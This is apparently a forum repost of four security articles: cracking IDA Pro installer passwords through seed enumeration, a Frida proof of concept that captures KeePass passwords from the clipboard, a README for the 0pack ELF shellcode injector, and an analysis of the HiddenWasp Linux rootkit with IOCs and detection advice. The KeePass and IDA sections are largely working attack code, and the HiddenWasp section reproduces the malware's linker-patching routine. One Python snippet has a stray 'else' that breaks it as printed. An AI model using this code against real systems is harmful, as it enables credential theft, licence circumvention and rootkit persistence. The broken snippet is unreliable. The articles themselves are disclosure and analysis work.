Posts posted by Nytro

1. Operation Crack: Hacking IDA Pro Installer PRNG from an Unusual Way


    By Shaolin on 2019-06-21


    Introduction

Today, we are going to talk about the installation password of Hex-Rays IDA Pro, the most famous decompiler. What is an installation password? Generally, customers receive a custom installer and an installation password after they purchase IDA Pro. The installation password is required during the installation process. However, if someday we find a leaked IDA Pro installer, is it still possible to install it without the installation password? This is an interesting topic.

After brainstorming with our team members, we verified the answer: yes! With a Linux or macOS installer, we can easily find the password directly. With a Windows installer, we only need 10 minutes to calculate the password. The following is the detailed process:

* Linux and macOS version

The first challenge is the Linux and macOS version. The installer is built with an installer creation tool called InstallBuilder. We found the plaintext installation password directly in the memory of the running IDA Pro installer process. Mission complete!


This problem was fixed after we reported it to Hex-Rays. BitRock released InstallBuilder 19.2.0, which protects the installation password, on 2019/02/11.

    * Windows version

It gets harder with the Windows version, because the installer is built with Inno Setup, which stores the password as a 160-bit SHA-1 hash. Therefore, we cannot get the password simply by statically or dynamically analyzing the installer, and brute force is apparently not an effective approach. But the situation is different if we can grasp the password generation methodology, which lets us enumerate candidate passwords much more effectively!

Although we realized we needed to find out how Hex-Rays generates passwords, this was still really difficult, as we did not know which language the random number generator was implemented in. There are at least 88 known random number generators; that is a lot of variation.

We first tried to find the charset used by the random number generator. We collected all leaked installation passwords, such as Hacking Team's password, which was leaked by WikiLeaks:

• FgVQyXZY2XFk
• 7ChFzSbF4aik
• ZFdLqEM2QMVe
• 6VYGSyLguBfi

    From the collected passwords we can summarize the charset:
    23456789ABCDEFGHJKLMPQRSTUVWXYZabcdefghijkmpqrstuvwxyz

The absence of 1, I, l, 0, O, o, N, and n makes sense, because these characters are easily confused.
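This observation is easy to reproduce: take the union of the characters of every collected password. A minimal Python sketch (the four passwords above alone do not cover the whole 54-character set, so the more leaked passwords collected, the better):

    leaked = [
        "FgVQyXZY2XFk",
        "7ChFzSbF4aik",
        "ZFdLqEM2QMVe",
        "6VYGSyLguBfi",
        # ...plus every other collected password
    ]
    charset = "".join(sorted(set("".join(leaked))))
    print(charset)
    print(len(charset), "distinct characters observed so far")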
Next, we guessed the possible charset orderings:

    23456789ABCDEFGHJKLMPQRSTUVWXYZabcdefghijkmpqrstuvwxyz
    ABCDEFGHJKLMPQRSTUVWXYZ23456789abcdefghijkmpqrstuvwxyz
    23456789abcdefghijkmpqrstuvwxyzABCDEFGHJKLMPQRSTUVWXYZ
    abcdefghijkmpqrstuvwxyz23456789ABCDEFGHJKLMPQRSTUVWXYZ
    abcdefghijkmpqrstuvwxyzABCDEFGHJKLMPQRSTUVWXYZ23456789
    ABCDEFGHJKLMPQRSTUVWXYZabcdefghijkmpqrstuvwxyz23456789
    

Lastly, we picked some common languages (C/PHP/Python/Perl), implemented a random number generator in each, and enumerated all the combinations. Then we examined whether the collected passwords appeared among them. For example, here is a generator written in C:

    #include<stdio.h>
    #include<stdlib.h>
    
    char _a[] = "23456789ABCDEFGHJKLMPQRSTUVWXYZabcdefghijkmpqrstuvwxyz";
    char _b[] = "ABCDEFGHJKLMPQRSTUVWXYZ23456789abcdefghijkmpqrstuvwxyz";
    char _c[] = "23456789abcdefghijkmpqrstuvwxyzABCDEFGHJKLMPQRSTUVWXYZ";
    char _d[] = "abcdefghijkmpqrstuvwxyz23456789ABCDEFGHJKLMPQRSTUVWXYZ";
    char _e[] = "abcdefghijkmpqrstuvwxyzABCDEFGHJKLMPQRSTUVWXYZ23456789";
    char _f[] = "ABCDEFGHJKLMPQRSTUVWXYZabcdefghijkmpqrstuvwxyz23456789";
    
    int main()
    {
            char bufa[21]={0};
            char bufb[21]={0};
            char bufc[21]={0};
            char bufd[21]={0};
            char bufe[21]={0};
            char buff[21]={0};
    
unsigned long long i=0; /* 64-bit counter so the 2^32 bound below works */
while(i<0x100000000ULL)
{
        srand((unsigned int)i);
    
                    for(size_t n=0;n<20;n++)
                    {
                            int key= rand() % 54;
                            bufa[n]=_a[key];
                            bufb[n]=_b[key];
                            bufc[n]=_c[key];
                            bufd[n]=_d[key];
                            bufe[n]=_e[key];
                            buff[n]=_f[key];
    
                    }
                    printf("%s\n",bufa);
                    printf("%s\n",bufb);
                    printf("%s\n",bufc);
                    printf("%s\n",bufd);
                    printf("%s\n",bufe);
                    printf("%s\n",buff);
                    i=i+1;
            }
    }
    

After a month, we finally succeeded in generating IDA Pro installation passwords with Perl, and the correct charset ordering is abcdefghijkmpqrstuvwxyzABCDEFGHJKLMPQRSTUVWXYZ23456789. For example, we can generate Hacking Team's leaked password FgVQyXZY2XFk with the following script:

    #!/usr/bin/env perl
    #
    @_e = split //,"abcdefghijkmpqrstuvwxyzABCDEFGHJKLMPQRSTUVWXYZ23456789";
    
$seed=3326487116;
srand($seed);
    $pw="";
    
    for($i=0;$i<12;++$i)
    {
            $key = rand 54;
            $pw = $pw . $_e[$key];
    }
    print "$i $pw\n";
    

With this, we can build a dictionary of installation passwords, which greatly increases the efficiency of a brute-force attack. Generally, we can compute the password of one installer in 10 minutes.
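As a sketch of that attack in Python, assuming the dictionary was generated by a script like the Perl one above, and assuming a check_password() helper matched to the target installer (the exact Inno Setup salting and encoding depend on the installer version, so the hashing below is deliberately simplified):

    import hashlib

    def check_password(candidate, target_sha1_hex):
        # Simplified stand-in: real Inno Setup installers salt the password
        # before SHA-1 hashing, so adapt this to the target version.
        return hashlib.sha1(candidate.encode()).hexdigest() == target_sha1_hex

    def crack(dictionary_path, target_sha1_hex):
        with open(dictionary_path) as f:
            for line in f:
                fields = line.split()
                if not fields:
                    continue
                candidate = fields[-1]  # the generator prints "seed password"
                if check_password(candidate, target_sha1_hex):
                    return candidate
        return None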

    We have reported this issue to Hex-Rays, and they promised to harden the installation password immediately.

    Summary

In this article, we discussed the possibility of installing IDA Pro without owning the installation password. In the end, we found the plaintext password in the program memory of the Linux and macOS versions. For the Windows version, we determined the password generation methodology, so we can build a dictionary to accelerate a brute-force attack. Finally, we can recover one password in a reasonable amount of time.

We really enjoyed this process: make a careful surmise, then do our best to prove it. It broadens our experience whether or not the result turns out to be correct, which is why we were willing to spend a whole month verifying such a difficult surmise. We take the same attitude in our Red Team Assessments. Give it a try!

Lastly, we would like to thank Hex-Rays for their friendly and rapid response. Although this issue is not covered by their Security Bug Bounty Program, they still generously awarded us the IDA Pro Linux and macOS versions, and upgraded the Windows version for us. We really appreciate it.

    Timeline

    • Jan 31, 2019 - Report to Hex-Rays
    • Feb 01, 2019 - Hex-Rays promised to harden the installation password and reported to BitRock
    • Feb 11, 2019 - BitRock released InstallBuilder 19.2.0

     

Source: https://devco.re/blog/2019/06/21/operation-crack-hacking-IDA-Pro-installer-PRNG-from-an-unusual-way-en/

2. Fun With Frida

By James on Jun 2

In this post, we're going to take a quick look at Frida and use it to steal credentials from KeePass.

    According to their website, Frida is a “dynamic instrumentation framework”. Essentially, it allows us to inject into a running process then interact with that process via JavaScript. It’s commonly used for mobile app testing, but is supported on Windows, OSX and *Nix as well.

    KeePass is a free and open-source password manager with official builds for Windows, but unofficial releases exist for most Linux flavors. We are going to look at the latest official Windows version 2 release (2.42.1).

    To follow along, you will need Frida, KeePass and Visual Studio (or any other editor you want to load a .net project in). You will also need the KeePass source from https://keepass.info/download.html

The first step is figuring out what we want to achieve. Like most password managers, KeePass protects stored credentials with a master password. This password is entered by the user and allows the KeePass database to be accessed. Once unlocked, usernames and passwords can be copied to the clipboard to allow them to be entered. Given that password managers allow the easy use of strong passwords, it's a fairly safe assumption that users will be copying and pasting passwords. Let's take a look at how KeePass interacts with the clipboard.

After a bit of digging (hint: the search tool is your friend), we find some references to the "SetClipboardData" Windows API call. It looks like KeePass calls the native Windows API directly to manage the clipboard.


Looking at which methods reference this call, we find one reference within ClipboardUtil.Windows.cs.


    It looks like the “SetDataW” method is how KeePass interacts with the clipboard.

private static bool SetDataW(uint uFormat, byte[] pbData)
{
    UIntPtr pSize = new UIntPtr((uint)pbData.Length);
    IntPtr h = NativeMethods.GlobalAlloc(NativeMethods.GHND, pSize);
    if(h == IntPtr.Zero) { Debug.Assert(false); return false; }

    Debug.Assert(NativeMethods.GlobalSize(h).ToUInt64() >=
        (ulong)pbData.Length); // Might be larger

    IntPtr pMem = NativeMethods.GlobalLock(h);
    if(pMem == IntPtr.Zero)
    {
        Debug.Assert(false);
        NativeMethods.GlobalFree(h);
        return false;
    }

    Marshal.Copy(pbData, 0, pMem, pbData.Length);
    NativeMethods.GlobalUnlock(h); // May return false on success

    if(NativeMethods.SetClipboardData(uFormat, h) == IntPtr.Zero)
    {
        Debug.Assert(false);
        NativeMethods.GlobalFree(h);
        return false;
    }

    return true;
}

This code uses native method calls to allocate some memory, writes the supplied pbData byte array to that location, and then calls the SetClipboardData API, passing a handle to the memory containing the contents of pbData.

To confirm this is the code we want to target, we can add a breakpoint and debug the app. Before we can build the solution, we need to fix up the signing key. The easiest way is just to disable signing for the KeePass and KeePassLib projects (Right click -> Properties -> Signing -> uncheck "Sign the assembly" -> save).

    With our breakpoint set we can run KeePass, open a database and copy a credential (right click -> copy password). Our breakpoint is hit and we can inspect the value of pbData. If you get a build error, double check you have disabled signing and try again.


    In this case, the copied password was “AABBCCDD”, which matches the bytes shown. We can confirm this by adding a bit of code to the method and re-running our test.

    var str = System.Text.Encoding.Default.GetString(pbData);

    This will convert the pbData byte array to a string, which we can inspect with the debugger.


    This looks like a good method to target, as the app only calls the SetClipboardData native API in one place (meaning we shouldn’t need to filter out any calls we don’t care about). Time to fire up Frida.

    Before we get into hooking the KeePass application, we need a way to inject Frida. For this example, we are going to use a simple python3 script.

    import frida
    import sys
    import codecs
    def on_message(message, data):
        if message['type'] == 'send':
            print(message['payload'])
        elif message['type'] == 'error':
            print(message['stack'])
    else:
        print(message)
    try:
        session = frida.attach("KeePass.exe")
        print ("[+] Process Attached")
    except Exception as e:
        print (f"Error => {e}")
        sys.exit(0)
    with codecs.open('./Inject.js', 'r', 'utf-8') as f:
        source = f.read()
    script = session.create_script(source)
    script.on('message', on_message)
    script.load()
    try:
        while True:
            pass
    except KeyboardInterrupt:
        session.detach()
        sys.exit(0)

This looks complicated, but doesn't actually do that much. The interesting part happens inside the try/except block. We attempt to attach to the "KeePass.exe" process, then inject a .js file containing our code to interact with the process and set up messaging. The "on_message" function allows messages to be received from the target process; we just print them to the console. This code is basically generic, so you can re-use it for any other process you want to target.

    Our code to interact with the process will be written in the “Inject.js” file.

    First, we need to grab a reference to the SetClipboardData API.

    var user32_SetClipboardData = Module.findExportByName("user32.dll", "SetClipboardData")

    We can then attach to this call, which sets up our hook.

    // Attach a hook to the native pointer
    Interceptor.attach(user32_SetClipboardData, {
     onEnter: function (args, state) {
            console.log("[+] KeePass called SetClipboardData");
     },
     
     onLeave: function (retval) {
     }
    });

    The “OnEnter” method is called as the target process calls SetClipboardData. OnLeave, as you might expect, is called just before the hooked method returns.

    I’ve added a simple console.log call to the OnEnter function, which will let us test our hook and make sure we aren’t getting any erroneous API calls showing up.

    With KeePass.exe running (you can use the official released binary now, no need to run the debug version from Visual Studio), run the python script. You should see the “process attached” message. Unlock KeePass and copy a credential. You should see the “KeePass called SetClipboardData” message.


    KeePass, by default, clears the clipboard after 12 seconds. You will see another “KeePass called SetClipboardData” message when this occurs. We can strip that out later.

Looking at the SetClipboardData API documentation, we can see that two parameters are passed.


    A format value, and a handle. The handle is essentially a pointer to the memory address containing the data to add to the clipboard. For this example, we can safely ignore the format value (this is used to specify the type of data to be added to the clipboard). KeePass uses one of two format values, I’ll leave it as an exercise for the reader to modify the PoC to support both formats fully.

    The main thing we need to know is that the second argument is the memory address we want to access. In Frida, we gain access to arguments passed to hooked methods via the “args” array. We can then use the Frida API to read data from the address passed to hMem.

// Get native pointer to SetClipboardData
     var user32_SetClipboardData = Module.findExportByName("user32.dll", "SetClipboardData")
     
     // Attach a hook to the native pointer
     Interceptor.attach(user32_SetClipboardData, {
      onEnter: function (args, state) {
             console.log("[+] KeePass called SetClipboardData");
             var ptr = args[1].readPointer().readByteArray(32);
             console.log(ptr)
      },
      
      onLeave: function (retval) {
      }
     });

Here we call readPointer() on args[1], then read a byte array from it. Note that the call to readByteArray() requires a length value, which we don't have. While it should be possible to grab this from other calls, we can sidestep the complexity by simply reading a set number of bytes. This is a slightly naive approach, but it's sufficient for our purposes.

    Kill the python script and re-run (you don’t need to re-start KeePass). Copy some data and you should see the byte array written to the console.


Frida automatically formats the byte array for us. We can see the password "AABBCCDD" being set on the clipboard, followed by "--" 12 seconds later. This is the string KeePass uses to overwrite the clipboard data.

This is enough information to flesh out our PoC. We can convert the byte array to a string, then check if the string starts with "--" to ignore the data when KeePass clears the clipboard. Note that this is, again, a fairly naive approach and introduces an obvious bug whereby a password starting with "--" would not be captured. Another exercise for the reader!

    This gives us our complete PoC.

// Get native pointer to SetClipboardData
    var user32_SetClipboardData = Module.findExportByName("user32.dll", "SetClipboardData")
    // Attach a hook to the native pointer
    Interceptor.attach(user32_SetClipboardData, {
     onEnter: function (args, state) {
            console.log("[+] KeePass called SetClipboardData");
            var ptr = args[1].readPointer().readByteArray(32);
            var str = ab2str(ptr);
            if(!str.startsWith("--")){
                console.log("[+] Captured Data!")
                console.log(str);        
            }
            else{
                console.log("[+] Clipboard was cleared")
            }
     },
     
     onLeave: function (retval) {
     }
    });
    function ab2str(buf){
        return String.fromCharCode.apply(null, new Uint16Array(buf));
    }

The ab2str function converts a byte array to a string; the rest should be self-explanatory. If we run this PoC we should see the captured password and a message telling us the clipboard was cleared.


That's all for this post. There is obviously some work to do before we could use this on an engagement, but we can see how powerful Frida can be. It's worth noting that you do not need any privileges to inject into the KeePass process; all the examples were run with KeePass and CMD running as a standard user.

     
3. 0pack

    Description

An ELF x64 binary payload injector written in C++ using the LIEF library. It injects shellcode written in fasm into the ELF header as relocations. Execution begins at entrypoint 0, i.e. the header, which confuses or downright breaks debuggers. The whole first segment is rwx; this can be mitigated at runtime through an injected payload which sets the binary's segment to just rx.

    Compiler flags

The targeted binary must be built with the following flags: gcc -m64 -fPIE -pie

Static linking is not possible, as -pie and -static are incompatible flags. Or in other terms:

    -static means a statically linked executable with no dynamic
    > relocations and only PT_LOAD segments.  -pie means a shared library with
    > dynamic relocations and PT_INTERP and PT_DYNAMIC segments.
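A quick way to verify that a target binary meets this requirement is to read e_type from its ELF header; a minimal Python sketch, assuming a little-endian ELF (which covers x86_64):

    import struct

    ET_EXEC, ET_DYN = 2, 3

    def is_pie(path):
        with open(path, "rb") as f:
            header = f.read(18)
        if header[:4] != b"\x7fELF":
            raise ValueError("not an ELF file")
        (e_type,) = struct.unpack_from("<H", header, 16)
        return e_type == ET_DYN  # -pie produces ET_DYN, -static produces ET_EXEC

Note that shared libraries are also ET_DYN, so this confirms the flag rather than proving the file is a PIE executable.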
    

    Presentation links

    HTML: https://luis-hebendanz.github.io/0pack/
    PDF: https://github.com/Luis-Hebendanz/0pack/raw/master/0pack-presentation.pdf
    Video: https://github.com/Luis-Hebendanz/0pack/raw/master/html/showcase_video.webm

    Debugger behaviour

Debuggers generally don't like 0 as the entrypoint, and oftentimes it is impossible to set breakpoints in the header area. Another common issue is that the entry0 label gets set incorrectly to the main label, which means the attacker can purposely mislead the reverse engineer into analyzing fake code by jumping over the main method. Executing db entry0 in radare2 exhibits this behaviour.

    Affected debuggers

    • radare2
    • Hopper
    • gdb
    • IDA Pro --> Not tested

    0pack help

    Injects shellcode as relocations into an ELF binary
    Usage:
      0pack [OPTION...]
    
      -d, --debug            Enable debugging
      -i, --input arg        Input file path. Required.
      -p, --payload arg      Fasm payload path.
      -b, --bin_payload arg  Binary payload path.
      -o, --output arg       Output file path. Required.
      -s, --strip            Strip the binary. Optional.
    

    -b, --bin_payload

The bin_payload option reads a binary file and converts it to ELF relocations. 0pack appends a jmp to the original entrypoint after the binary payload.

    -p, --payload

Needs a fasm payload; 0pack prepends and appends "push/pop all registers" sequences, plus a jmp to the original entrypoint, to the payload.

    Remarks

Although I used the LIEF library to accomplish this task, I wouldn't encourage using it. It is very inconsistent and opaque about what it is doing. Oftentimes the library is downright broken. I did not find a working library for x64 PIE-enabled ELF binaries. If someone has suggestions, feel free to email me at: luis.nixos@gmail.com

    Dependencies

    • cmake version 3.12.2 or higher
    • build-essential
    • gcc
    • fasm

    Use build script

    $ ./build.sh

    Build it manually

      $ mkdir build
      $ cd build
      $ cmake ..
      $ make
      $ ./../main.elf

Source: https://github.com/Luis-Hebendanz/0pack

4. HiddenWasp Malware Stings Targeted Linux Systems

By Ignacio Sanmillan, 29.05.19

    Overview

    • Intezer has discovered a new, sophisticated malware that we have named “HiddenWasp”, targeting Linux systems.

    • The malware is still active and has a zero-detection rate in all major anti-virus systems.

    • Unlike common Linux malware, HiddenWasp is not focused on crypto-mining or DDoS activity. It is a trojan purely used for targeted remote control.

• Evidence shows with high probability that the malware is used in targeted attacks, against victims who are already under the attacker's control or have gone through heavy reconnaissance.

    • HiddenWasp authors have adopted a large amount of code from various publicly available open-source malware, such as Mirai and the Azazel rootkit. In addition, there are some similarities between this malware and other Chinese malware families, however the attribution is made with low confidence.

    • We have detailed our recommendations for preventing and responding to this threat.

     

    1. Introduction

    Although the Linux threat ecosystem is crowded with IoT DDoS botnets and crypto-mining malware, it is not very common to spot trojans or backdoors in the wild.

    Unlike Windows malware, Linux malware authors do not seem to invest too much effort writing their implants. In an open-source ecosystem there is a high ratio of publicly available code that can be copied and adapted by attackers.

In addition, anti-virus solutions for Linux tend not to be as resilient as on other platforms. Therefore, threat actors targeting Linux systems are less concerned about implementing excessive evasion techniques, since even when reusing extensive amounts of code, threats manage to stay relatively under the radar.

Nevertheless, malware with strong evasion techniques does exist for the Linux platform. There is also a high ratio of publicly available open-source malware that utilizes strong evasion techniques and can be easily adapted by attackers.

    We believe this fact is alarming for the security community since many implants today have very low detection rates, making these threats difficult to detect and respond to.

We have discovered further undetected Linux malware that appears to enforce advanced evasion techniques, using rootkits to leverage trojan-based implants.

In this blog we will present a technical analysis of each of the components that this new malware, HiddenWasp, is composed of. We will also highlight interesting code-reuse connections that we have observed between it and several open-source malware projects.

    The following images are screenshots from VirusTotal of the newer undetected malware samples discovered:


     

    2. Technical Analysis

    When we came across these samples we noticed that the majority of their code was unique:


    Similar to the recent Winnti Linux variants reported by Chronicle, the infrastructure of this malware is composed of a user-mode rootkit, a trojan and an initial deployment script. We will cover each of the three components in this post, analyzing them and their interactions with one another.

     

    2.1 Initial Deployment Script:

    When we spotted these undetected files in VirusTotal it seemed that among the uploaded artifacts there was a bash script along with a trojan implant binary.


    We observed that these files were uploaded to VirusTotal using a path containing the name of a Chinese-based forensics company known as Shen Zhou Wang Yun Information Technology Co., Ltd.

Furthermore, the malware implants seem to be hosted on servers belonging to a physical server hosting company known as ThinkDream, located in Hong Kong.


    Among the uploaded files, we observed that one of the files was a bash script meant to deploy the malware itself into a given compromised system, although it appears to be for testing purposes:


Thanks to this file, we were able to download further artifacts related to this campaign that were not present in VirusTotal. The script starts by defining a set of variables that will be used throughout it.


    Among these variables we can spot the credentials of a user named ‘sftp’, including its hardcoded password. This user seems to be created as a means to provide initial persistence to the compromised system:


Furthermore, after the user account has been created, the script proceeds to clean the system in order to update older variants if the system was already compromised:


The script will then proceed to download a tar-compressed archive from a download server, according to the architecture of the compromised system. This tarball contains all of the malware's components: the rootkit, the trojan and an initial deployment script:


After the malware components have been installed, the script proceeds to execute the trojan:


We can see that the main trojan binary is executed, the rootkit is added to the LD_PRELOAD path, and a series of other environment variables are set, such as 'I_AM_HIDDEN'. We will cover the role of this environment variable throughout this post. Finally, the script attempts to install reboot persistence for the trojan binary by adding it to /etc/rc.local.

    Within this script we were able to observe that the main implants were downloaded in the form of tarballs. As previously mentioned, each tarball contains the main trojan, the rootkit and a deployment script for x86 and x86_64 builds accordingly.


The deployment script offers interesting insights into further features that the malware implements, such as the introduction of a new environment variable, 'HIDE_THIS_SHELL':


We found some of the environment variables used in an open-source rootkit known as Azazel.


It seems that this actor changed Azazel's default environment variable, HIDE_THIS_SHELL, to I_AM_HIDDEN. We base this conclusion on the fact that HIDE_THIS_SHELL is not used in the rest of the malware's components and appears to be a residual remnant of the original Azazel code.

The majority of the code in the rootkit implants involved in this malware's infrastructure is noticeably different from the original Azazel project. Winnti Linux variants are also known to have reused code from this open-source project.

     

    2.2 The Rootkit:

The rootkit is a user-space rootkit enforced via the LD_PRELOAD Linux mechanism.

    It is delivered in the form of an ET_DYN stripped ELF binary.

This shared object has a DT_INIT dynamic entry. The value held by this entry is an address that will be executed once the shared object is loaded by a given process:


Within this function, we can see that control flow eventually falls into a function in charge of resolving a set of dynamic imports (the functions it will later hook), alongside decoding a series of strings needed for the rootkit's operation.


We can see that for each string it allocates a new dynamic buffer and copies the string into it before decoding it.

It seems that the implementation of dynamic import resolution varies slightly from the one used in the Azazel rootkit.

When we wrote a script to simulate the cipher implemented by the string decoding function, we observed the following algorithm:


We recognized that a similar algorithm was used in the past by Mirai, implying that the authors behind this rootkit may have ported and modified some code from Mirai.
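For reference, Mirai's string obfuscation boils down to XORing every byte of a string with the four bytes of a 32-bit key; a minimal Python sketch of that scheme (the key is a placeholder to be recovered from the sample, and HiddenWasp's variant is only similar, not identical):

    TABLE_KEY = 0xDEADBEEF  # placeholder 32-bit key
    KEY_BYTES = [(TABLE_KEY >> s) & 0xFF for s in (0, 8, 16, 24)]

    def decode_string(blob):
        out = bytearray(blob)
        for i in range(len(out)):
            for k in KEY_BYTES:
                out[i] ^= k  # XOR with each key byte in turn
        return bytes(out)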


After the rootkit's main object has been loaded into the address space of a given process and has decrypted its strings, it exports the functions that are intended to be hooked. These exports are the following:


For every given export, the rootkit hooks and implements a specific operation accordingly, although they all have a similar layout. Before the original hooked function is called, it checks whether the environment variable 'I_AM_HIDDEN' is set:


    We can see an example of how the rootkit hooks the function fopen in the following screenshot:


We have observed that after checking whether the 'I_AM_HIDDEN' environment variable is set, the hook runs a function to hide all of the rootkit's and trojan's artifacts. In addition, the fopen hook specifically checks whether the file being opened is '/proc/net/tcp'; if it is, it attempts to hide the malware's connection to the C&C by scanning every entry for the source or destination port used to communicate with the C&C, in this case 61061. This is also the default port of the Azazel rootkit.
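The effect of this hook can be modelled in a few lines of Python: /proc/net/tcp stores addresses as hexadecimal IP:port pairs, so hiding the connection only requires dropping every row whose local or remote port matches the C&C port. A sketch of the filtering logic:

    CNC_PORT = 61061

    def filter_proc_net_tcp(lines):
        for line in lines:
            fields = line.split()
            # data rows hold local/remote addresses as "hexIP:hexPORT"
            if len(fields) > 2 and ":" in fields[1] and ":" in fields[2]:
                local_port = int(fields[1].rsplit(":", 1)[1], 16)
                remote_port = int(fields[2].rsplit(":", 1)[1], 16)
                if CNC_PORT in (local_port, remote_port):
                    continue  # hide the C&C connection
            yield line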


The rootkit primarily implements artifact-hiding mechanisms, as well as the TCP connection hiding previously mentioned. The overall functionality of the rootkit is illustrated in the following diagram:


     

    2.3 The Trojan:

The trojan comes in the form of a statically linked ELF binary linked against stdlibc++. We noticed that the trojan has code connections with ChinaZ's Elknot implant, with regard to a common MD5 implementation in one of the statically linked libraries:


In addition, we also see a high rate of shared strings with other known ChinaZ malware, reinforcing the possibility that the actors behind HiddenWasp integrated and modified some MD5 implementation from Elknot that may have been shared on Chinese hacking forums:


When we analyzed the main function, we noticed that the first action the trojan takes is to retrieve its configuration:


    The malware configuration is appended at the end of the file and has the following structure:


The malware will try to load itself from disk and parse this blob to retrieve the static encrypted configuration.


Once the encrypted configuration has been successfully retrieved, it is decoded and then parsed as JSON.

    The cipher used to encode and decode the configuration is the following:


This cipher seems to be an RC4-like algorithm with an already-computed, PRGA-generated key-stream. It is important to note that this same cipher is used later in the network communication protocol between trojan clients and their C&Cs.
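In other words, the payload is XORed against a fixed key-stream table starting at a chosen offset, so encryption and decryption are the same operation. A minimal Python sketch (the real key-stream is hardcoded in the binary; wrapping around the table is an assumption here):

    KEYSTREAM = bytes(256)  # placeholder for the table hardcoded in the sample

    def crypt(data, offset):
        return bytes(b ^ KEYSTREAM[(offset + i) % len(KEYSTREAM)]
                     for i, b in enumerate(data))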

After the configuration is decoded, the following JSON is retrieved:


Moreover, if the file is running as root, the malware will attempt to change the default location of the dynamic linker's LD_PRELOAD path. This location is usually /etc/ld.so.preload; however, it is always possible to patch the dynamic linker binary to change this path:


The patch_ld function will scan for any existing /lib paths. The scanned paths are the following:


The malware will attempt to find the dynamic linker binary within these paths. The dynamic linker's filename is usually prefixed with ld-<version number>.


Once the dynamic linker is located, the malware will find the offset at which the /etc/ld.so.preload string is located within the binary and overwrite it with the new target preload path, /sbin/.ifup-local.


To achieve this patching, it executes a formatted string using the xxd hex editor utility, having previously hex-encoded the path of the rootkit.

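Conceptually, the patch is a simple in-place string overwrite; a Python equivalent of that xxd one-liner (the replacement path is shorter than the original, so it is NUL-padded to keep the binary layout intact):

    OLD = b"/etc/ld.so.preload\x00"
    NEW = b"/sbin/.ifup-local\x00"

    def patch_ld(linker_path):
        with open(linker_path, "r+b") as f:
            data = f.read()
            off = data.find(OLD)
            if off == -1:
                return False
            f.seek(off)
            f.write(NEW.ljust(len(OLD), b"\x00"))  # pad so nothing shifts
        return True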

Once it has changed the dynamic linker's default LD_PRELOAD path, it deploys a thread to enforce that the rootkit is successfully installed via the new LD_PRELOAD path. In addition, the trojan communicates with the rootkit via the 'I_AM_HIDDEN' environment variable, to serialize the trojan's session so the rootkit can apply evasion mechanisms to any other sessions.


After seeing the rootkit's functionality, we can understand that the rootkit and trojan work together to help each other remain persistent on the system: the rootkit attempts to hide the trojan, and the trojan enforces that the rootkit remains operational. The following diagram illustrates this relationship:


    Continuing with the execution flow of the trojan, a series of functions are executed to enforce evasion of some artifacts:


    These artifacts are the following:


By performing some OSINT on these artifact names, we found that they belong to a Chinese open-source rootkit for Linux known as Adore-ng, hosted on GitHub:


The fact that these artifacts are searched for suggests that the Linux systems targeted by these implants may already have been compromised with some variant of this open-source rootkit, as an additional artifact in this malware's infrastructure. Although those paths are searched for in order to hide their presence on the system, it is important to note that none of the analyzed artifacts related to this malware are installed at such paths.

This finding may imply that the systems this malware aims to intrude are targets already known to be compromised, either by the same group or by a third party collaborating toward the same end goal of this particular campaign.

Moreover, the trojan communicates using a simple network protocol over TCP. We can see that when a connection is established to the Master or Stand-By servers, there is a handshake mechanism involved to identify the client.


With the help of this function, we were able to understand the structure of the communication protocol employed. We can illustrate it by looking at a pcap of the initial handshake between the server and the client:


While analyzing this protocol, we noticed that the Reserved and Method fields are always constant, 0 and 1 respectively. The cipher table offset represents the offset into the hardcoded key-stream with which the encrypted payload was encoded. The following is the fixed key-stream this field references:


After decrypting the traffic and analyzing some of the trojan's network-related functions, we noticed that the communication protocol is also implemented in JSON format. To show this, the following are the decrypted handshake packets between the C&C and the trojan:


    After the handshake is completed, the trojan will proceed to handle CNC requests:


Depending on the given request, the malware will perform different operations accordingly. An overview of the trojan's functionality, as driven by request handling, is shown below:

3. Prevention and Response

    Prevention: Block Command-and-Control IP addresses detailed in the IOCs section.

    Response: We have provided a YARA rule intended to be run against in-memory artifacts in order to be able to detect these implants.

    In addition, in order to check if your system is infected, you can search for “ld.so” files — if any of the files do not contain the string ‘/etc/ld.so.preload’, your system may be compromised. This is because the trojan implant will attempt to patch instances of ld.so in order to enforce the LD_PRELOAD mechanism from arbitrary locations.
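This check is easy to automate; here is a minimal Python sketch (the glob patterns are illustrative and should be extended to cover all the /lib paths listed earlier):

    import glob

    def find_patched_linkers():
        suspicious = []
        for pattern in ("/lib/ld-*", "/lib64/ld-*", "/lib/*/ld-*"):
            for path in glob.glob(pattern):
                try:
                    with open(path, "rb") as f:
                        if b"/etc/ld.so.preload" not in f.read():
                            suspicious.append(path)
                except OSError:
                    continue
        return suspicious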

     

    4. Summary

We analyzed every component of HiddenWasp, explaining how the rootkit and trojan implants work in parallel with each other to enforce persistence in the system.

    We have also covered how the different components of HiddenWasp have adapted pieces of code from various open-source projects. Nevertheless, these implants managed to remain undetected.

    Linux malware may introduce new challenges for the security community that we have not yet seen in other platforms. The fact that this malware manages to stay under the radar should be a wake up call for the security industry to allocate greater efforts or resources to detect these threats.

Linux malware will continue to become more complex over time, and currently even common threats do not have high detection rates, while more sophisticated threats have even lower visibility.

     

    IOCs


    103.206.123[.]13
    103.206.122[.]245
    http://103.206.123[.]13:8080/system.tar.gz
    http://103.206.123[.]13:8080/configUpdate.tar.gz
    http://103.206.123[.]13:8080/configUpdate-32.tar.gz
    e9e2e84ed423bfc8e82eb434cede5c9568ab44e7af410a85e5d5eb24b1e622e3
    f321685342fa373c33eb9479176a086a1c56c90a1826a0aef3450809ffc01e5d
    d66bbbccd19587e67632585d0ac944e34e4d5fa2b9f3bb3f900f517c7bbf518b
    0fe1248ecab199bee383cef69f2de77d33b269ad1664127b366a4e745b1199c8
    2ea291aeb0905c31716fe5e39ff111724a3c461e3029830d2bfa77c1b3656fc0
    d596acc70426a16760a2b2cc78ca2cc65c5a23bb79316627c0b2e16489bf86c0
    609bbf4ccc2cb0fcbe0d5891eea7d97a05a0b29431c468bf3badd83fc4414578
    8e3b92e49447a67ed32b3afadbc24c51975ff22acbd0cf8090b078c0a4a7b53d
    f38ab11c28e944536e00ca14954df5f4d08c1222811fef49baded5009bbbc9a2
    8914fd1cfade5059e626be90f18972ec963bbed75101c7fbf4a88a6da2bc671b

    By Ignacio Sanmillan
     

    Nacho is a security researcher specializing in reverse engineering and malware analysis. Nacho plays a key role in Intezer's malware hunting and investigation operations, analyzing and documenting new undetected threats. Some of his latest research involves detecting new Linux malware and finding links between different threat actors. Nacho is an adept ELF researcher, having written numerous papers and conducting projects implementing state-of-the-art obfuscation and anti-analysis techniques in the ELF file format.

     

Source: https://www.intezer.com/blog-hiddenwasp-malware-targeting-linux-systems/

